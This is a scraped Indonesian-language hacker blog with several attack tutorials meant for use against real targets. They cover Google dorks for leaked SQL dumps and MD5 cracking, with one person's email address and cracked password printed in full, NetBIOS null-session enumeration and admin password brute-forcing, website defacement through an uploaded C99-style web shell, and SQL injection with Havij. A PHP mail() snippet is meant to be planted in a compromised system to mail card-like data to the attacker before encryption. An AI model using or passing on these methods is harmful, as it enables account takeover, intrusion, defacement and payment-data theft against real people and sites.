2 Juli 2012
at
7/02/2012 05:05:00 AM
|
0
comments
Posted by
Pratama Sitinjak
H4cKeR sUmBuLXXX= MORDONG =XXX |
|||||
24 Juni 2011
at
6/24/2011 11:10:00 AM
|
0
comments
Berikut POC + PICT nya jadi gak ada yang protes minta POC sama PICT Btw langsung saja ke TKP : Hari ini ane akan menunjukkan kepada Anda cara hack account email menggunakan beberapa Dorks google khusus, ingat google adalah teman kita. Persyaratan: Google Dorks: ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e ext:sql intext:"INSERT INTO" intext:@hotmail.com intextpassword Quote:ext:sql intext:@hotmail.com intextpassword Quote:ext:sql intext:@hotmail.com Online Hash Cracker: http://md5crack.com/ Ok mari kita mulai: Mari kita pergi ke http://www.google.com dan copy paste kan dork yang ane share,…..dan cari salah satu situs di sana buat korban Pilih salah satu halaman ditampilkan, seperti yang Anda lihat sekarang kita memiliki banyak account email + hash Saya memilih account acak zhaokailun92@yahoo.com.cn d2491b289b6be1fd0bb0c8d60 e053d3d Kita buka MD5 Cracker Hash, Bisa Disini: http://md5crack.com , atau anda bisa cari di google tools untuk Crack MD5 password, banyak bertebaran. Kemudian masukkan hashnya ke tools MD5 online Cracker, jadi seperti gambar berikut: Seperti yang Anda lihat kita dapat menghack account yang kita tuju Email: zhaokailun92 @ yahoo. com.cn Password: 19920707 Ets, bersenang-senang dan menikmati akun tak terbatas ,…btw jgn hack email ane yahh cuma numpang share aja kok ,… Tutor nya jga baru ane pelajari jadi jika ada yang salah maafin yoo..
Posted by
Pratama Sitinjak
Hack Local Area Network – LAN Hack – LAN Hacking. This technique will be taking advantage of Port 139. Most of the time,Port 139 will be opened. First of all,I will do a port scanning at the target computer which is 192.168.40.128. This computer is inside my LAN network. I will scan it using Nmap. I get the result and it shows Port 139 is opened up for me. Now you will need both of these tools: ** USER2SID & SID2USER ** NetBios Auditing Tool You can get both of them on the Internet. After you get both of them,put them in the C:\ directory. You now need to create a null session to the target computer. Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER. We will first using USER2SID to get the ID. We will test against the Guest account because Guest account is a built in account. After we get the ID,we need to do some modification on the ID. We take the ID we get from the guest account and modified it become “5 21 861567501 1383384898 839522115 500″. Please leave out the S-1-,leave out all the – too. Now you will see that you get the username of the Administrator account. In this case,the Administrator account is Administrator. Create a text file called user.txt and the content will be the username of the Admin account. Prepare yourself a good wordlist. Now put both of them in the same directory with the NetBios Auditing Tool. Now we are going to crack the Admin account for the password in order to access to the target computer. Browse to the NetBios Auditing Tool directory. Press on enter and the tool will run through the passlist. In this case,I have get the password. In order to proof that I can get access to the target computer using this password. After you press enter,it will prompt you for the username and password. Therefore,just input them inside the prompt and continue. Target C drive will be on your screen. In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139. The download link of the tools will be: Download Tools.rar
Posted by
Pratama Sitinjak
Hi semuanya, kembali lagi dengan saya. Kali ini mau berbagi bagaimana cara Deface Website, karena yang request Cara Deface Website ini banyak sekali, bejibun masuk ke email saya. Akhirnya saya membuat artikel ini untuk memenuhi peremintaan kalian semua, let’s DEFACE WEBSITE – DEFACING WEBSITE.. Okelah kalau begitu semuanya, langsung lanjut ajah, skenarionya sebagai berikut:
1. Silakan cari target di google, misalnya: “inurl:page.php?xxx=” atau “intitle: Google Dork” (Kumpulan google dork banyak tersedia di google, silakan di search aja) atau anda bisa melihat list Google Dork Di www.exploit-db.com , kemudian inject target website tersebut. Nah, kebetulan saya mendapatkan target dibawah & kemudian melakukan aktifitas shell injection, berikut gambarnya: 2. Langkah selanjutnya, saya melakukan upload fmbh.php (File Manager Binus Hacker), Anda bisa menggunakan Rshell / C99 untuk di upload ke website target tersebut. Directory yang saya pakai di webtarget adalah /vservers/silentcat/htdocs/includes/. Jadi ketika saya membuka shell di target menjadi: http://www.target.com/includes/fmbh.php 3. Setelah itu kita siapkan file halaman defacement: “HACKED.html” Kemudian kita save menjadi: “HACKED.html” 4. Upload “HACKED.html” ke website target tadi, saya melakukan upload di /vservers/silentcat/htdocs/ artinya saya berada di lingkungan home directory. Upload file HACKED.html, dari local computer yang anda simpan tadi. Sehingga akan tampak hasil upload file “HACKED.html” sebagai berikut: Dikarenakan permissionnya “600” (rw——-), artinya hanya Owner saja yang bisa melakukan “read & write” di file tersebut, kita harus merubah permissionnya menjadi “777″ / “755″, kalau 777 artinya semuanya memiliki akses “read, write & execute”, sedangkan saya hanya memakai “755″ biar bisa di baca & eksekusi saja: 5. Jika sudah selesai, maka lihat hasil DEFACE di: “http://www.target.com/hacked.html” , berikut hasil tampilannya: Nah, sudah selesai.. Cukup mudah melakukan deface website, silakan lakukan eksperimen yang lebih banyak lagi. Enjoy & Eat It!
Posted by
Pratama Sitinjak
Dunia sekarang sungguh sangat dipermudah, tinggal jadi pemakai sudah bisa langsung jago dalam hal SQL Injection, tanpa harus mengetahui dasar-dasarnya. You can call your self what? Oke lah, ini hanya sekedar sharing bagaimana caranya SQL Injection Havij: 1. Silakan cari target dengan menggunakan SQL Injection Vulnerability, bisa di cari dan didapat dari exploit-db.com, silakan ditemukan disini: http://www.exploit-db.com/webapps , cari vulnerability yang memiliki keyword “SQL INJECTION“. 2. Kemudian silakan download HAVIJ TOOLS FREE atau DOWNLOAD HAVIJ PRO (Thanks To AcizNinja For Update): 3. Wajib untuk download bantuan & help berikut: PDF HELP & CHM HELP 4. Berikut ini adalah beberapa images HAVIJ TOOLS: 5. Langkah-langkah utama dalam Havij:
Posted by
Pratama Sitinjak
Ingin mengoperasikan komputer anda dengan cepat? Ingat perintah ini. Ini benar-benar akan menghemat banyak waktu Anda. Ada banyak perintah yang mungkin belum pernah anda lihat atau tidak tahu. Ada sifat tertentu dari windows yang anda tidak tahu ada di system. Dibawah ini terdapat 112 perintah yang dapat dijalankan pada Aplikasi Run, dimana di sebelah kiri adalah fungsi aplikasi, dan disebelah kanan adalah fungsi perintah yang dapat anda jalankan dengan mengklik Start, Run, lalu ketik perintah kemudian klik Ok.
Posted by
Pratama Sitinjak
Berikut ini gw mau jelasin trik yang sangat menarik buat anda pelajarin. Merupakan sebuah logging informasi data yang masuk, dan kemudian dikirim ke email kita. Ini sempet dibahas di BinusHacker Hack Show 30 Mei 2009 di #BinusHacker @Irc.Dal.Net Lets begin! Memaksimalkan Fungsi Email = Hacking is Knowledge = Tujuan dari memaksimalnya email pada topic ini adalah untuk logging informasi & data! Pertama: Kita menggunakan script PHP (Private Home Page) Fungsi yang kita pake adalah mail(); Dimana pengiriman email dilakukan: contoh: <?php // Contoh penggunaan $Orangnya = “Budi Anduk”; $NoId = “123456789″; $CID = “234″; $Exp = “10/2009″; $Nama = “Nama Pengirim”; $Emailnya = “email@pengirim.com”; // Email Pengirim $Penerima = “emailanda@yahoo.com”; // Email Anda Sebagai Penerimas $IsiEmail = “Berikut Ini Isi Log Data: “. $Orangnya .” “. $NoId .” “. $CID .” “. $Exp .” “; // Isi Email $Subject = “Logging Data & Informasi”; // Judul Email $Header = “From: “. $Nama . ” <” . $Emailnya . “>\r\n”; // Untuk Header mail($Penerima, $Subject, $IsiEmail, $Header); ?> Dari contoh di atas maka dapat kita simpulkan bahwa, kita bisa menggunakan fasilitas pengirim email untuk melakukan logging Terkadang banyak file yang terenkripsi yang ada didatabase Sehingga kita susah untuk melakukan decryptnya Maka cara ini dapat kita gunakan.. Jika kita mendapatkan sebuah target dalam system, dan disitu terjadi aktifitas pengiriman data ke database server dari client Maka, kita dapat melakukan pengambilan data sebelum dilakukan encyption Dengan cara menyisipkan variable” baru, yang bisa kita gunakan untuk menyimpan informasi & data Kemudian kita kirim ke email kita tanpa terenkripsi sama skali.. Enak bukan? Hahahha.. That is the concept! Silakan baca artikel, analisa script, silakan download dibawah: Nah, untuk penjelasan lengkapnya anda bisa download tutorial dan ujicoba lengkapnya di: http://www.indowebster.com/EmailLoggingHckShow.html Untuk melakukan hasil contohnya, anda upload semua file ke sebuah hosting, kemudian praktekkan sesuai dengan contoh. Jangan lupa ganti email pengirim menjadi: <? $Penerima = “emailanda@domainemailanda.com”; // Email Anda Sebagai Penerima ?> Selamat mencoba! Semoga berhasil Enjoy & Eat it!
Posted by
Pratama Sitinjak
|
TENTANG SAYAMARVEL and SPIDER-MAN: TM & 2007 Marvel Characters, Inc. Motion Picture © 2007 Columbia Pictures Industries, Inc. All Rights Reserved. 2007 Sony Pictures Digital Inc. All rights reserved. blogger template by blog forum.
|